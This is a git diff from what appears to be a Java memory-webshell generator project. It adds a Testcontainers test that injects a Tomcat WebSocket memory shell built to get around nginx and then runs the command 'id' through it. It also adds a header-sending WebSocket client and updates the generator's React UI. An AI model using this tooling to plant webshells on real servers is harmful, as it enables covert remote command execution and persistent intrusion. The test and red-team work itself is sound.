org.junit.jupiter.api.Assertions.assertTrue; + +/** + * @author ReaJason + * @since 2026/1/13 + */ +@Testcontainers +@Slf4j +public class tomcat10WebSocketBypassNginxTest { + + public static final String imageName = "tomcat:10.1-jre11"; + + @Container + public static final ComposeContainer compose = + new ComposeContainer(new File("docker-compose/tomcat/docker-compose-10.1-jre11-nginx.yaml")) + .withExposedService("tomcat", 8080, Wait.forHttp("/app/")) + .withExposedService("nginx", 80); + + @Test + public void testWs() { + String url = getUrl(); + String server = ServerType.TOMCAT; + String serverVersion = "Unknown"; + int targetJdkVersion = Opcodes.V11; + String shellType = ShellType.JAKARTA_BYPASS_NGINX_WEBSOCKET; + String shellTool = ShellTool.Command; + Packers packer = Packers.Base64; + Pair urls = ShellAssertion.getUrls(url, shellType, shellTool, packer); + String shellUrl = urls.getLeft(); + String urlPattern = urls.getRight(); + ShellToolConfig shellToolConfig = ShellAssertion.getShellToolConfig(shellType, shellTool, packer); + MemShellResult generateResult = ShellAssertion.generate(urlPattern, server, serverVersion, shellType, shellTool, targetJdkVersion, shellToolConfig, packer); + ShellAssertion.packerResultAndInject(generateResult, url, shellTool, shellType, packer, null); + CommandConfig commandConfig = (CommandConfig) generateResult.getShellToolConfig(); + // direct connect ws will cause failed + assertThrows(IllegalStateException.class, () -> BlockingJavaWebSocketClient.sendRequestWaitResponse(shellUrl, "id"), "WebSocket connection is not open."); + // connect by valve bypass will success + String response = BlockingJavaWebSocketClient.sendRequestWaitResponseWithHeader(shellUrl, "id", commandConfig.getHeaderName(), commandConfig.getHeaderValue()); + assertTrue(response.contains("uid=")); + } + + public static String getUrl() { + String host = compose.getServiceHost("nginx", 80); + int port = compose.getServicePort("nginx", 80); + String url = "http://" + host + ":" + port + "/app"; + log.info("container started, app url is : {}", url); + return url; + } +} diff --git a/tools/godzilla/src/main/java/com/reajason/javaweb/godzilla/BlockingJavaWebSocketClient.java b/tools/godzilla/src/main/java/com/reajason/javaweb/godzilla/BlockingJavaWebSocketClient.java index a32bae72..3a5250f4 100644 --- a/tools/godzilla/src/main/java/com/reajason/javaweb/godzilla/BlockingJavaWebSocketClient.java +++ b/tools/godzilla/src/main/java/com/reajason/javaweb/godzilla/BlockingJavaWebSocketClient.java @@ -120,6 +120,13 @@ public class BlockingJavaWebSocketClient extends WebSocketClient { return blockingJavaWebSocketClient.sendRequest(message); } + @SneakyThrows + public static String sendRequestWaitResponseWithHeader(String entrypoint, String message, String headerName, String headerValue) { + BlockingJavaWebSocketClient blockingJavaWebSocketClient = new BlockingJavaWebSocketClient(URI.create(entrypoint)); + blockingJavaWebSocketClient.addHeader(headerName, headerValue); + return blockingJavaWebSocketClient.sendRequest(message); + } + @SneakyThrows public static byte[] sendRequestWaitResponse(String entrypoint, ByteBuffer message) { BlockingJavaWebSocketClient blockingJavaWebSocketClient = new BlockingJavaWebSocketClient(URI.create(entrypoint)); diff --git a/web/app/components/copyable-field.tsx b/web/app/components/copyable-field.tsx index 4261b344..ac67b883 100644 --- a/web/app/components/copyable-field.tsx +++ b/web/app/components/copyable-field.tsx @@ -1,21 +1,29 @@ import { Check, Copy } from "lucide-react"; -import { useCallback, useEffect, useState } from "react"; +import { + type ComponentPropsWithoutRef, + useCallback, + useEffect, + useState, +} from "react"; import CopyToClipboard from "react-copy-to-clipboard"; import { useTranslation } from "react-i18next"; import { toast } from "sonner"; import { Button } from "@/components/ui/button"; import { Label } from "@/components/ui/label"; +import { cn } from "@/lib/utils"; -interface CopyableFieldProps { +type CopyableFieldProps = { label: string; value?: string; text?: string; -} +} & Omit, "children">; export function CopyableField({ label, value, text, + className, + ...divProps }: Readonly) { const [hasCopied, setHasCopied] = useState(false); const { t } = useTranslation(["common"]); @@ -39,7 +47,7 @@ export function CopyableField({ }, [hasCopied, label, t]); return ( -
+
{value && ( diff --git a/web/app/components/memshell/results/basic-info.tsx b/web/app/components/memshell/results/basic-info.tsx index 7ed9180b..5a400204 100644 --- a/web/app/components/memshell/results/basic-info.tsx +++ b/web/app/components/memshell/results/basic-info.tsx @@ -1,4 +1,5 @@ import { FileTextIcon } from "lucide-react"; +import { Fragment } from "react/jsx-runtime"; import { useTranslation } from "react-i18next"; import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"; import { Separator } from "@/components/ui/separator"; @@ -45,13 +46,12 @@ export function BasicInfo({ label={t("mainConfig.shellMountType")} text={generateResult?.shellConfig.shellType} /> - {!notNeedUrlPattern(generateResult?.shellConfig?.shellType) && ( - - )} +
{generateResult?.shellConfig.shellTool !== ShellToolType.Custom && ( @@ -121,17 +121,35 @@ export function BasicInfo({ )} {generateResult?.shellConfig.shellTool === ShellToolType.Command && ( - + + )} {(generateResult?.shellConfig.shellTool === ShellToolType.Suo5 || generateResult?.shellConfig.shellTool === ShellToolType.Suo5v2) && ( diff --git a/web/app/components/memshell/tabs/command-tab.tsx b/web/app/components/memshell/tabs/command-tab.tsx index a2bab9da..c76df469 100644 --- a/web/app/components/memshell/tabs/command-tab.tsx +++ b/web/app/components/memshell/tabs/command-tab.tsx @@ -1,7 +1,7 @@ import { useQuery } from "@tanstack/react-query"; import { ChevronDown, ChevronRight, InfoIcon } from "lucide-react"; import { useState } from "react"; -import { Controller, type UseFormReturn } from "react-hook-form"; +import { Controller, type UseFormReturn, useWatch } from "react-hook-form"; import { useTranslation } from "react-i18next"; import { Card, CardContent } from "@/components/ui/card"; import { @@ -38,6 +38,10 @@ export function CommandTabContent({ }>) { const { t } = useTranslation(["memshell", "common"]); const [isAdvancedOpen, setIsAdvancedOpen] = useState(false); + const shellType = useWatch({ + name: "shellType", + control: form.control, + }); const { data } = useQuery<{ encryptors: Array; implementationClasses: Array; @@ -58,7 +62,7 @@ export function CommandTabContent({ control={form.control} name="commandParamName" render={({ field }) => ( - +